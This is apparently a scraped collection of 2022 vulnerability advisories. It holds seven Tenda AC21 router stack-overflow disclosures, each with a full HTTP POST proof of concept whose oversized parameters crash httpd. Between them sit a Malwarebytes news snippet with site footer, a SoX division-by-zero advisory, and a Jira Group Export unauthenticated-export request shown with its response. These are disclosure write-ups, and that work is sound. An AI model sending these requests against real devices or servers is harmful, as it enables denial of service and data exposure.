Tenda AC21 V16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: fromSetWifiGusetBasic.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionfromSetWifiGusetBasic

Attacker can use this vulnerability via theshareSpeed parameter.

it calls strcpy(v12, v7) and v12 is on the stack, so there is a stack buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WifiGuestSet HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 23
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    shareSpeed=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can cause httpd reboot.

CVE-2022-40076: Vuln/Tenda AC21/4 at main · xxy1126/Vuln

Tenda AC21 V16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: formSetQosBand.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionformSetQosBand

Attackers can cause this vulnerability via parameter list

In function formSetQosBand, it calls set_qosMib_list and pass v2 to it.

In function set_qosMib_list, it calls strcpy(v8, s), v8 is on the stack, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetNetControlList HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 879
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.08852963756997312&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07aduufcvb
    Connection: close
    
    list=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can makehttpd reboot

CVE-2022-40068: Vuln/Tenda AC21/10 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: formSetVirtualSer.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionformSetVirtualSer

Attackers can cause this vulnerability via parameter list

In function formSetVirtualSer, it calls save_virtualser_data and vulnerability is in this function.

In function save_virtualser_data , it calls sscanf to read strings in v9(a2) to parameter on the stack without checking its length , so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetVirtualServerCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 160
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.278922737111333&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adfmbcvb
    Connection: close
    
    list=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can makehttpd reboot

CVE-2022-40067: Vuln/Tenda AC21/9 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, formSetDeviceName.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionformSetDeviceName

In function formSetDeviceName, it calls set_device_name and pass v3, v4 to it.

\\

In set_device_name, it calls sprintf(v4, "%s;1", a1) and a1 is the POST parameter devName , v4 is on the stack, so there is a stack overflow.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetOnlineDevName HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 264
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    mac=9c:fc:e8:da:9c:5b&devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40071: Vuln/Tenda AC21/2 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via bin/httpd, function: formSetFirewallCfg.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionformSetFirewallCfg

Attackers can cause this vulnerability via parameter firewallEn

It copies s to v4 which is on the stack, so there is a stack overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetFirewallCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 1364
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adamlcvb
    Connection: close
    
    firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can makehttpd reboot

CVE-2022-40070: Vuln/Tenda AC21/8 at main · xxy1126/Vuln

]Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: fromSetSysTime.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionfromSetSysTime

In function fromSetSysTime, it calls sub_496104(a1), the vulnerability is in this function.

In sub_496104(a1), it calls sscanf() and the v6, v7 is on the stack, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 754
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adhyecvb
    Connection: close
    
    timeType=sync&timeZone=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111%3A11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40069: Vuln/Tenda AC21/6 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: setSmartPowerManagement.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionsetSmartPowerManagement

Attackers can cause this vulnerability via parameter time

the sscanf function read string from s, and pass to v10 which is on the stack without checking its length, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/PowerSaveSet HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 1087
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9241437684734013&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adqtucvb
    Connection: close
    
    nptr=0&powerSaveDelay=0&ledCloseType=0&time=11:11-11:11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can makehttpd reboot

CVE-2022-40072: Vuln/Tenda AC21/7 at main · xxy1126/Vuln

Categories: News
Tags: North Face

Tags:  Uber

Tags:  Edge

Tags:  MDR

Tags:  MSP

Tags:  Seasaw

Tags:  fuzzing

Tags:  iOS 16

Tags:  WPGateway

Tags:  Steam

Tags:  Pixel

Tags:  zero-days

Tags:  passkey

Tags:  Facebook

The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (September 12 – 18) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (September 12 – 18)

SoX suffers from a division by zero attack when handling WAV files, resulting in denial of service vulnerability and possibly loss of data.

Title: SoX 14.4.2 (wav.c) Division By Zero  
Advisory ID: ZSL-2022-5712  
Type: Local  
Impact: DoS  
Risk: (2/5)  
Release Date: 18.09.2022

**Summary**

SoX (Sound eXchange) is the Swiss Army knife of sound processing tools: it can convert sound files between many different file formats and audio devices, and can apply many sound effects and transformations, as well as doing basic analysis and providing input to more capable analysis and plotting tools.

**Description**

SoX suffers from a division by zero attack when handling WAV files, resulting in denial of service vulnerability and possibly loss of data.

**Vendor**

Chris Bagwell - http://sox.sourceforge.net

**Affected Version**

<=14.4.2

**Tested On**

Ubuntu 18.04.6 LTS  
Microsoft Windows 10 Home

**Vendor Status**

N/A

**PoC**

sox\_div0.txt  
sox\_div0.wav.zip

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[18.09.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

SoX 14.4.2 (wav.c) Division By Zero

The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.

Unauthenticated Group Export for Jira < 1.0.3

Vulnerability Type: Unauthenticated Group Export

Vendor of Product: Atlassian Jira

Affected Product Code Base: Group Export for Jira

Product Version: < 1.0.3

Description: The Group Export for Jira < 1.0.3 versions allow unauthenticated user to export the groups from the Jira instance.

Attack Vectors: Attacker could make an HTTP request to the affected endpoint and get the list of Jira groups present.

Attack Type: Remote

Endpoint: /plugins/servlet/groupexportforjira/admin/json

Assigned CVE-ID: CVE-2022-39960

Steps To Reproduce

1\. Issue a HTTP POST request to the following endpoint: https://<jira.example.com>/plugins/servlet/groupexportforjira/admin/\[format\]

2\. For the HTTP POST Data send the following: "groupexport\_searchstring=&groupexport\_download=true"

#PoC

\[REQUEST\]

POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1

Host: jira.example.local

Content-Length: 51

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

Connection: close

groupexport\_searchstring=&groupexport\_download=true

\[RESPONSE\]

HTTP/1.1 200

X-AREQUESTID: 996x459x1

Referrer-Policy: strict-origin-when-cross-origin

X-XSS-Protection: 1; mode=block

X-Content-Type-Options: nosniff

X-Frame-Options: SAMEORIGIN

Content-Security-Policy: sandbox

Strict-Transport-Security: max-age=31536000

Set-Cookie: atlassian.xsrf.token=B2KZ-BVLZ-WLZO-E635\_0caad26e8df61a1995bb595e1e00d6f869571707\_lout; Path=/

X-AUSERNAME: anonymous

Content-Disposition: attachment; filename="jira-group-export-41178cce-e033-4f0a-bfad-c909e2435c5d.json"

Vary: User-Agent

Content-Type: application/json;charset=UTF-8

Connection: close

Content-Length: 815

{"jiraGroupObjects":\[{"groupName":"jira-administrators","jiraGroupApplicationRoleObjects":\[{"name":"Jira Software"}\],"users":1, \[REDACTED\]}\]}

Tag

#windows